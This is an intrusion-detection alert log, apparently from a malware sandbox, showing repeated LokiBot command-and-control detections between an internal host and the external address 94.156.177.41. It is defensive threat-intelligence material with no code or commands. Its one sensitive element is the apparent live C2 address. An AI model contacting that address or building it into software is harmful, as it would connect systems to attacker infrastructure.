2024-11-22T17:38:57.847693+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:59.730255+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:01.391645+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:03.187495+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:04.874345+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:06.624697+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:08.251882+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:10.075035+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:11.694205+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:13.452854+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:15.106129+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:16.873576+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:18.772634+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:20.515914+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:22.314600+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:24.067071+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:25.697513+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:27.435691+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:29.277428+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:30.980502+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:32.779202+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:34.454700+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:36.638264+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:38.319161+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:40.156593+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:41.832002+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:43.599899+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:45.307094+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:47.159997+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:49.169189+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:50.892509+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:52.742489+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:54.532238+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:56.154638+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:57.905221+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:59.617555+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:01.461227+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:03.120405+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:04.910450+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:06.653374+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:08.480379+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:10.283380+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:11.940390+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:13.780404+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:15.455772+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:17.167831+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:18.923857+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:20.873102+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:22.672655+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50000	94.156.177.41	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:18.696905+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	50000	TCP
2024-11-22T17:38:25.060056+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49736	TCP
2024-11-22T17:38:26.901213+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49738	TCP
2024-11-22T17:38:28.759253+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49739	TCP
2024-11-22T17:38:30.564948+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49740	TCP
2024-11-22T17:38:32.375028+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49741	TCP
2024-11-22T17:38:34.060918+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49743	TCP
2024-11-22T17:38:35.862948+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49745	TCP
2024-11-22T17:38:37.847124+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49748	TCP
2024-11-22T17:38:39.689057+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49749	TCP
2024-11-22T17:38:41.388207+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49751	TCP
2024-11-22T17:38:43.138286+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49753	TCP
2024-11-22T17:38:44.941143+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49754	TCP
2024-11-22T17:38:46.707141+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49755	TCP
2024-11-22T17:38:48.418123+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49756	TCP
2024-11-22T17:38:50.222754+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49757	TCP
2024-11-22T17:38:52.042226+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49758	TCP
2024-11-22T17:38:53.883990+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49759	TCP
2024-11-22T17:38:55.733469+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49760	TCP
2024-11-22T17:38:57.577179+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49762	TCP
2024-11-22T17:38:59.426546+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49768	TCP
2024-11-22T17:39:01.131407+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49769	TCP
2024-11-22T17:39:02.920927+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49775	TCP
2024-11-22T17:39:04.600571+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49781	TCP
2024-11-22T17:39:06.355478+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49787	TCP
2024-11-22T17:39:07.980188+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49788	TCP
2024-11-22T17:39:09.802909+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49794	TCP
2024-11-22T17:39:11.424821+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49800	TCP
2024-11-22T17:39:13.174861+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49806	TCP
2024-11-22T17:39:14.848103+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49807	TCP
2024-11-22T17:39:16.600800+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49814	TCP
2024-11-22T17:39:18.412865+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49820	TCP
2024-11-22T17:39:20.251127+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49826	TCP
2024-11-22T17:39:22.044326+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49830	TCP
2024-11-22T17:39:23.796270+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49834	TCP
2024-11-22T17:39:25.422629+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49839	TCP
2024-11-22T17:39:27.173859+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49845	TCP
2024-11-22T17:39:29.008704+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49851	TCP
2024-11-22T17:39:30.723332+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49853	TCP
2024-11-22T17:39:32.439587+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49858	TCP
2024-11-22T17:39:34.184105+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49864	TCP
2024-11-22T17:39:36.030123+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49869	TCP
2024-11-22T17:39:38.031130+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49875	TCP
2024-11-22T17:39:39.893944+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49878	TCP
2024-11-22T17:39:41.556669+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49883	TCP
2024-11-22T17:39:43.330266+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49889	TCP
2024-11-22T17:39:45.051310+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49894	TCP
2024-11-22T17:39:46.887092+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49898	TCP
2024-11-22T17:39:48.686602+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49902	TCP
2024-11-22T17:39:50.616894+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49907	TCP
2024-11-22T17:39:52.461465+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49913	TCP
2024-11-22T17:39:54.273217+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49917	TCP
2024-11-22T17:39:55.885986+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49922	TCP
2024-11-22T17:39:57.636701+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49926	TCP
2024-11-22T17:39:59.348827+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49932	TCP
2024-11-22T17:40:01.189433+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49937	TCP
2024-11-22T17:40:02.986093+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49942	TCP
2024-11-22T17:40:04.646103+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49945	TCP
2024-11-22T17:40:06.389791+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49951	TCP
2024-11-22T17:40:08.225755+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49957	TCP
2024-11-22T17:40:10.011540+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49961	TCP
2024-11-22T17:40:11.677531+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49965	TCP
2024-11-22T17:40:13.513836+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49970	TCP
2024-11-22T17:40:15.188463+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49976	TCP
2024-11-22T17:40:16.897699+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49981	TCP
2024-11-22T17:40:18.649027+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49984	TCP
2024-11-22T17:40:20.449796+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49990	TCP
2024-11-22T17:40:22.401027+0100	2025483	1	A Network Trojan was detected	94.156.177.41	80	192.168.2.4	49995	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:24.937744+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:26.773102+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:28.639683+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:30.444496+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:32.251170+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:33.940877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:35.739391+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:37.721603+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:39.565166+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:41.267831+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:43.017979+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:44.821525+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:46.587354+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:48.298382+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:50.103232+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:51.916181+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:53.761108+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:55.610382+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:57.457422+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:59.302710+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:39:01.010755+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:02.801173+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:04.480951+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:06.235877+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:07.860411+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:09.682146+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:11.305204+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:13.054807+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:14.727841+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:16.481024+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:18.289205+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:20.131550+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:21.922262+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:23.676175+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:25.302977+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:27.054176+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:28.889019+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:30.602180+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:32.319975+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:34.064527+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:35.909915+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:37.911435+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:39.774405+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:41.435946+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:43.209941+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:44.928389+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:46.764115+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:48.566331+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:50.496975+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:52.341897+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:54.151907+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:55.765985+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:57.517015+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:59.228879+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:40:01.069978+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:02.745174+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:04.526328+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:06.269586+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:08.104776+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:09.891749+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:11.557939+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:13.394137+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:15.065652+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:16.777601+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:18.529455+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:20.330214+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:22.279856+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:24.138359+0100	2024313	1	Malware Command and Control Activity Detected	192.168.2.4	50000	94.156.177.41	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:24.937744+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:26.773102+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:28.639683+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:30.444496+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:32.251170+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:33.940877+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:35.739391+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:37.721603+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:39.565166+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:41.267831+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:43.017979+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:44.821525+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:46.587354+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:48.298382+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:50.103232+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:51.916181+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:53.761108+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:55.610382+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:57.457422+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:59.302710+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:39:01.010755+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:02.801173+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:04.480951+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:06.235877+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:07.860411+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:09.682146+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:11.305204+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:13.054807+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:14.727841+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:16.481024+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:18.289205+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:20.131550+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:21.922262+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:23.676175+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:25.302977+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:27.054176+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:28.889019+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:30.602180+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:32.319975+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:34.064527+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:35.909915+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:37.911435+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:39.774405+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:41.435946+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:43.209941+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:44.928389+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.41	80	TCP
